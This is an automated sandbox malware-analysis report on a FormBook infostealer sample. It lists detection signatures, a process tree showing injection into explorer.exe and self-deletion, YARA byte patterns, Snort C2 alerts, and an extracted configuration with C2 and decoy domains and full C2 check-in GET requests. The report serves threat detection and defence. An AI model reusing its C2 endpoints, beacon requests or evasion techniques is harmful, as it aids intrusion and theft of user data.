Windows Analysis Report
triage_dropped_file

Overview

General Information

Sample Name: triage_dropped_file (renamed file extension from none to exe)
Analysis ID: 562157
MD5: f6eaacd1b39028130602ee0892e67663
SHA1: 12ba0b4e8c41ececa29814f9b64da351e5509fb0
SHA256: 1e144fefc15a6a2643674f01b3324e29b5320d45a16a081e8aad8a969712cb9d
Tags: exe, formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Uses netsh to modify the Windows network and firewall settings
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • triage_dropped_file.exe (PID: 3428 cmdline: "C:\Users\user\Desktop\triage_dropped_file.exe" MD5: F6EAACD1B39028130602EE0892E67663)
    • triage_dropped_file.exe (PID: 3212 cmdline: C:\Users\user\Desktop\triage_dropped_file.exe MD5: F6EAACD1B39028130602EE0892E67663)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autofmt.exe (PID: 6736 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: 7FC345F685C2A58283872D851316ACC4)
        • netsh.exe (PID: 6764 cmdline: C:\Windows\SysWOW64\netsh.exe MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
          • cmd.exe (PID: 6840 cmdline: /c del "C:\Users\user\Desktop\triage_dropped_file.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
Malware Configuration (FormBook): {"C2 list": ["www.hstolchsjybyl.com/a83r/"], "decoy": ["comercializadoralonso.com", "durhamschoolservces.com", "onegreencapital.com", "smartcities24.com", "maquinas.store", "brianlovesbonsai.com", "xin41518s.com", "moneyearnus.xyz", "be-mix.com", "fengyat.club", "inspectdecided.xyz", "paksafpakistan.com", "orhidlnt.top", "princesuraj.com", "vietnamvodka.com", "renewnow.site", "imageservices.xyz", "luxurytravelfranchise.com", "kp112.red", "royalyorkfirewood.com", "azharrizvi.com", "mtvamazon.com", "stlouisplatinumhomes.com", "ke6rkmtn.xyz", "roomviser.xyz", "rollcalloutfitters.com", "jlautoparts.net", "swipyy.xyz", "handymansaltlakecity.com", "tuespr.com", "prelink.xyz", "whrpky037.xyz", "yoga-4-health.com", "silvermoonandcompany.com", "meg-roh.com", "81218121.com", "prayerteamusa.com", "ocejxu.com", "lopeyhomeimporvementservice.com", "dcosearchandconnect.xyz", "md-newspages.online", "elinmex.online", "traineriq.com", "feministecologies.com", "gyltogether.com", "polyversed.com", "rodolforios.com", "bcfs0l.com", "51dmm.com", "metaverselivecasinos.com", "csjsgk.com", "impactincentivesregistry.com", "firekim.space", "jdzn.xyz", "d6ybf7yj.xyz", "sturt.xyz", "serious-cam.com", "stihl-gms.com", "gentleman5.xyz", "rustbeltcoders.net", "hmarketsed96.com", "cricfreelive.com", "wellyounow.com", "fwdrow.com"]}
Yara matches in memory dumps (Source | Rule | Description | Author | Strings):

00000005.00000000.281504689.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000005.00000000.281504689.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b937:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c93a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000000.281504689.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18859:$sqlite3step: 68 34 1C 7B E1
  • 0x1896c:$sqlite3step: 68 34 1C 7B E1
  • 0x18888:$sqlite3text: 68 38 2A 90 C5
  • 0x189ad:$sqlite3text: 68 38 2A 90 C5
  • 0x1889b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x189c3:$sqlite3blob: 68 53 D8 7F 8C
0000000C.00000000.323777196.00000000071DA000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000C.00000000.323777196.00000000071DA000.00000040.00000001.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x26b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x21a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x27b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x292f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x141c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x8937:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x993a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Yara matches in unpacked PE files (Source | Rule | Description | Author | Strings):

5.2.triage_dropped_file.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
5.2.triage_dropped_file.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.triage_dropped_file.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x17a59:$sqlite3step: 68 34 1C 7B E1
  • 0x17b6c:$sqlite3step: 68 34 1C 7B E1
  • 0x17a88:$sqlite3text: 68 38 2A 90 C5
  • 0x17bad:$sqlite3text: 68 38 2A 90 C5
  • 0x17a9b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x17bc3:$sqlite3blob: 68 53 D8 7F 8C
5.0.triage_dropped_file.exe.400000.4.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
5.0.triage_dropped_file.exe.400000.4.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
No Sigma rule has matched

AV Detection

Source: 00000005.00000000.281504689.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.hstolchsjybyl.com/a83r/"], "decoy": ["comercializadoralonso.com", "durhamschoolservces.com", "onegreencapital.com", "smartcities24.com", "maquinas.store", "brianlovesbonsai.com", "xin41518s.com", "moneyearnus.xyz", "be-mix.com", "fengyat.club", "inspectdecided.xyz", "paksafpakistan.com", "orhidlnt.top", "princesuraj.com", "vietnamvodka.com", "renewnow.site", "imageservices.xyz", "luxurytravelfranchise.com", "kp112.red", "royalyorkfirewood.com", "azharrizvi.com", "mtvamazon.com", "stlouisplatinumhomes.com", "ke6rkmtn.xyz", "roomviser.xyz", "rollcalloutfitters.com", "jlautoparts.net", "swipyy.xyz", "handymansaltlakecity.com", "tuespr.com", "prelink.xyz", "whrpky037.xyz", "yoga-4-health.com", "silvermoonandcompany.com", "meg-roh.com", "81218121.com", "prayerteamusa.com", "ocejxu.com", "lopeyhomeimporvementservice.com", "dcosearchandconnect.xyz", "md-newspages.online", "elinmex.online", "traineriq.com", "feministecologies.com", "gyltogether.com", "polyversed.com", "rodolforios.com", "bcfs0l.com", "51dmm.com", "metaverselivecasinos.com", "csjsgk.com", "impactincentivesregistry.com", "firekim.space", "jdzn.xyz", "d6ybf7yj.xyz", "sturt.xyz", "serious-cam.com", "stihl-gms.com", "gentleman5.xyz", "rustbeltcoders.net", "hmarketsed96.com", "cricfreelive.com", "wellyounow.com", "fwdrow.com"]}
Source: triage_dropped_file.exe | Virustotal: Detection: 52%
Source: triage_dropped_file.exe | Metadefender: Detection: 21%
Source: triage_dropped_file.exe | ReversingLabs: Detection: 70%
Source: Yara match | File source: 5.2.triage_dropped_file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.triage_dropped_file.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.triage_dropped_file.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.triage_dropped_file.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.triage_dropped_file.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.triage_dropped_file.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.triage_dropped_file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000000.281504689.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000000.323777196.00000000071DA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.362800931.0000000001070000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.507022811.0000000000F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000000.311237190.00000000071DA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.363071763.00000000013B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.362401143.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.281804558.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.285937751.00000000041F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.506874755.0000000000F60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.505839508.0000000000980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: http://www.fengyat.club/a83r/?k2MLx=CjCejP19lpOaTsMOx5tDhI8S8yyOisIWAU++//65IFIgHpMHnqLlfGYboARBAcbNtYvQ&v2=5jBLRl1pIZPlY | Avira URL Cloud: Label: phishing
Source: http://www.inspectdecided.xyz/a83r/?v2=5jBLRl1pIZPlY&k2MLx=ZSxafiwoPrw2VCRk9gX3wlOewDINgI1JCq9hgmGWZWQPOxIps9jFRiFeHjLrjNblu9Aw | Avira URL Cloud: Label: malware
Source: www.hstolchsjybyl.com | Virustotal: Detection: 8%
Source: triage_dropped_file.exe | Joe Sandbox ML: detected
Source: 5.2.triage_dropped_file.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.triage_dropped_file.exe.400000.4.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.triage_dropped_file.exe.400000.6.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.triage_dropped_file.exe.400000.8.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: triage_dropped_file.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: triage_dropped_file.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\mNyEIdHepa\src\obj\Debug\UCOMITypeL.pdb source: triage_dropped_file.exe
Source: Binary string: netsh.pdb source: triage_dropped_file.exe, 00000005.00000002.364321923.0000000003460000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: triage_dropped_file.exe, 00000005.00000002.363232393.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, triage_dropped_file.exe, 00000005.00000002.363443966.000000000160F000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000015.00000002.507374686.0000000003210000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000015.00000002.507739154.000000000332F000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: netsh.pdbGCTL source: triage_dropped_file.exe, 00000005.00000002.364321923.0000000003460000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdb source: triage_dropped_file.exe, 00000005.00000002.363232393.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, triage_dropped_file.exe, 00000005.00000002.363443966.000000000160F000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, netsh.exe, 00000015.00000002.507374686.0000000003210000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000015.00000002.507739154.000000000332F000.00000040.00000800.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\triage_dropped_file.exe | Code function: 4x nop then pop esi
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4x nop then pop esi

Networking

Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49811 -> 104.21.22.47:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49811 -> 104.21.22.47:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49811 -> 104.21.22.47:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49820 -> 81.17.29.148:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49820 -> 81.17.29.148:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49820 -> 81.17.29.148:80
Source: C:\Windows\explorer.exe | Network Connect: 104.21.22.47 80
Source: C:\Windows\explorer.exe | Domain query: www.inspectdecided.xyz
Source: C:\Windows\explorer.exe | Network Connect: 188.114.96.7 80
Source: C:\Windows\explorer.exe | Domain query: www.fengyat.club
Source: C:\Windows\explorer.exe | DNS query: www.inspectdecided.xyz
Source: Malware configuration extractor | URLs: www.hstolchsjybyl.com/a83r/
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: global traffic | HTTP traffic detected: GET /a83r/?v2=5jBLRl1pIZPlY&k2MLx=ZSxafiwoPrw2VCRk9gX3wlOewDINgI1JCq9hgmGWZWQPOxIps9jFRiFeHjLrjNblu9Aw HTTP/1.1 | Host: www.inspectdecided.xyz | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /a83r/?k2MLx=CjCejP19lpOaTsMOx5tDhI8S8yyOisIWAU++//65IFIgHpMHnqLlfGYboARBAcbNtYvQ&v2=5jBLRl1pIZPlY HTTP/1.1 | Host: www.fengyat.club | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 188.114.96.7 188.114.96.7
Source: triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://fontfabrik.com
Source: triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.com
Source: triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sakkal.com
Source: triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.com
Source: triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.typography.netD
Source: triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: netsh.exe, 00000015.00000002.508497222.0000000003C2F000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://www.fengyat.club/a83r/?k2MLx=CjCejP19lpOaTsMOx5tDhI8S8yyOisIWAU
Source: unknown | DNS traffic detected: queries for: www.inspectdecided.xyz

E-Banking Fraud

Source: Yara match | File source: 5.2.triage_dropped_file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.triage_dropped_file.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.triage_dropped_file.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.triage_dropped_file.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.triage_dropped_file.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.triage_dropped_file.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.triage_dropped_file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000000.281504689.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000000.323777196.00000000071DA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.362800931.0000000001070000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.507022811.0000000000F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000000.311237190.00000000071DA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.363071763.00000000013B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.362401143.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.281804558.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.285937751.00000000041F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.506874755.0000000000F60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.505839508.0000000000980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: 5.2.triage_dropped_file.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.triage_dropped_file.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 5.0.triage_dropped_file.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.triage_dropped_file.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 5.0.triage_dropped_file.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.triage_dropped_file.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 5.0.triage_dropped_file.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.triage_dropped_file.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 5.0.triage_dropped_file.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.triage_dropped_file.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 5.0.triage_dropped_file.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.triage_dropped_file.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 5.2.triage_dropped_file.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.triage_dropped_file.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.281504689.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.281504689.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000000.323777196.00000000071DA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000000.323777196.00000000071DA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.362800931.0000000001070000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.362800931.0000000001070000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000015.00000002.507022811.0000000000F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000002.507022811.0000000000F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000000.311237190.00000000071DA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000000.311237190.00000000071DA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.363071763.00000000013B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
